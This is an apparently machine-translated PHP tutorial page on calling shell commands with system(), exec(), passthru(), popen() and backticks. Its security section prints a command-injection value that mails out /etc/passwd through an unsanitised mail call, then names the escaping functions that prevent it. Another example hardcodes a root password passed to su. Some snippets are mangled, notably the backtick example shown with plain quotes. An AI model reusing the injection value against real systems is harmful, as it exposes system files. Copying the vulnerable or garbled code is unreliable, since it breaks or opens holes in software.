Home > Backend Development > PHP Tutorial > PHP executes system external commands system() exec() passthru()_PHP tutorial

PHP executes system external commands system() exec() passthru()_PHP tutorial

WBOY
Release: 2016-07-21 15:45:18
Original
1026 people have browsed it

Difference:
system() outputs and returns the last line of shell results.
exec() does not output results and returns the last line of shell results. All results can be saved in a returned array.
passthru() only calls the command and outputs the result of the command directly to the standard output device as is.
Same point: you can get the status code of command execution
demo:

Copy code The code is as follows:

//system('dir');
// exec ('dir');
// passthru ('dir');
// echo `dir`;

As a server-side scripting language, PHP is fully capable of tasks such as writing simple or complex dynamic web pages. But this is not always the case. Sometimes in order to implement a certain function, you must resort to external programs (or commands) of the operating system, so that you can get twice the result with half the effort.
So, is it possible to call external commands in PHP scripts? If so, how to do it? What are your concerns? I believe that after reading this article, you will definitely be able to answer these questions.
Is it possible?
The answer is yes. PHP, like other programming languages, can call external commands within the program, and it is very simple: just use one or a few functions.
Prerequisites
Since PHP is basically used for WEB program development, security has become an important aspect that people consider. So PHP designers added a door to PHP: safe mode. If running in safe mode, the PHP script will be subject to the following four restrictions:
Execute external commands
There are some restrictions when opening files
Connect to MySQL database
HTTP-based authentication
In safe mode, only external programs in specific directories can be executed, and calls to other programs will be denied. This directory can be specified using the safe_mode_exec_dir directive in the php.ini file, or by adding the --with-exec-dir option when compiling PHP. The default is /usr/local/php/bin.
If you call an external command that should be able to output results (meaning that the PHP script has no errors), but get a blank, then it is likely that your network administrator has run PHP in safe mode.
How to do it?
To call external commands in PHP, you can use the following three methods:
1) Use the special functions provided by PHP
PHP provides a total of 3 special functions for executing external commands: system() , exec(), passthru().
system()
Prototype: string system (string command [, int return_var])
The system() function is similar to that in other languages. It executes the given command, outputs and returns the result. The second parameter is optional and is used to get the status code after the command is executed.
Example:
Copy code The code is as follows:

system("/usr/ local/bin/webalizer/webalizer");
?>

exec()
Prototype: string exec (string command [, string array [, int return_var]])
The exec () function is similar to system (). It also executes the given command, but does not output the result, but returns the last line of the result. Although it only returns the last line of the command result, using the second parameter array can get the complete result by appending the results line by line to the end of the array. So if the array is not empty, it is best to use unset() to clear it before calling it. Only when the second parameter is specified, the third parameter can be used to obtain the status code of command execution.
Example:
Copy code The code is as follows:

exec("/bin/ ls -l");
exec("/bin/ls -l", $res);
exec("/bin/ls -l", $res, $rc);
?> ;

passthru()
Prototype: void passthru (string command [, int return_var])
passthru () only calls the command and does not return any results, but saves the running results of the command Output directly to the standard output device as is. Therefore, the passthru() function is often used to call programs like pbmplus (a tool for processing images under Unix that outputs a binary stream of original images). It can also get the status code of command execution.
Example:
Copy code The code is as follows:

header("Content-type : image/gif");
passthru("./ppmtogif hunte.ppm");
?>

2) Use the popen() function to open the process
The above method can only simply execute the command, but cannot interact with the command. But sometimes you must enter something into the command. For example, when adding a Linux system user, you need to call su to change the current user to root, and the su command must enter the root password on the command line. In this case, it is obviously not possible to use the method mentioned above.
The popen () function opens a process pipe to execute the given command and returns a file handle. Since a file handle is returned, you can read and write to it. In PHP3, this kind of handle can only be used in a single operation mode, either writing or reading; starting from PHP4, it is possible to read and write at the same time. Unless the handle is opened in one mode (read or write), the pclose() function must be called to close it.
Example 1:
Copy code The code is as follows:

$fp=popen( "/bin/ls -l", "r");
?>

Example 2:
Copy code The code is as follows:

/* How to add a system user in PHP
The following is a routine to add a user named james,
The root password is very good. For reference only
*/
$sucommand = "su --login root --command";
$useradd = "useradd ";
$rootpasswd = "verygood";
$user = "james";
$user_add = sprintf("%s "%s %s"",$sucommand,$useradd,$user);
$fp = @popen($user_add,"w") ;
@fputs($fp,$rootpasswd);
@pclose($fp);
?>

3) Use a backtick (`, that is The one under the ESC key on the keyboard is the same as ~)
This method was not included in the PHP documentation before and existed as a secret technique. The method is very simple. Use two backticks to enclose the command to be executed as an expression. The value of this expression is the result of the command execution. For example:
Copy code The code is as follows:

$res='/bin/ls - l';
echo '
'.$res.'
';
?>

The output of this script is like:
hunte.gif
hunte.ppm
jpg.htm
jpg.jpg
passthru.php
What to consider?
Two issues to consider: security and timeouts.
Look at safety first. For example, you have a small online store, so the list of products available for sale is placed in a file. You write an HTML file with a form that lets your users enter their email address and then sends them a list of products. Assuming that you have not used PHP's mail() function (or have never heard of it), you call the mail program of the Linux/Unix system to send this file. The program is like this:
Copy code The code is as follows:

system("mail $to < products.txt");
echo "Our product catalog has been sent to your mailbox: $to";
?>

Use this code, generally There is no danger to users, but there are actually very large security holes. If a malicious user enters an EMAIL address like this:
'--bla ; mail someone@domain.com < /etc/passwd ;'
then this command eventually becomes:
' mail --bla ; mail someone@domain.com < /etc/passwd ; < products.txt'
I believe that any network administrator will break out in a cold sweat when seeing such a command.
Fortunately, PHP provides us with two functions: EscapeShellCmd() and EscapeShellArg(). The function EscapeShellCmd escapes all characters in a string that may be used to execute another command without the Shell. These characters have special meanings in the Shell, such as semicolon (), redirection (>), and reading from a file (<). The function EscapeShellArg is used to process command parameters. It adds single quotes around the given string and escapes the single quotes in the string so that the string can be safely used as a command argument.
Let’s look at the timeout issue again. If the command to be executed takes a long time, the command should be run in the background of the system. But by default, functions such as system() wait until the command is finished running before returning (actually, they have to wait for the output of the command), which will definitely cause the PHP script to time out. The solution is to redirect the output of the command to another file or stream, such as:
Copy the code The code is as follows:

system("/usr/local/bin/order_proc > /tmp/null &");
?>

www.bkjia.comtruehttp: //www.bkjia.com/PHPjc/320391.htmlTechArticleDifference: system() outputs and returns the last line of shell results. exec() does not output results and returns the last line of shell results. All results can be saved in a returned array. passth...
source:php.cn
Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Popular Tutorials
More>
Latest Downloads
More>
Web Effects
Website Source Code
Website Materials
Front End Template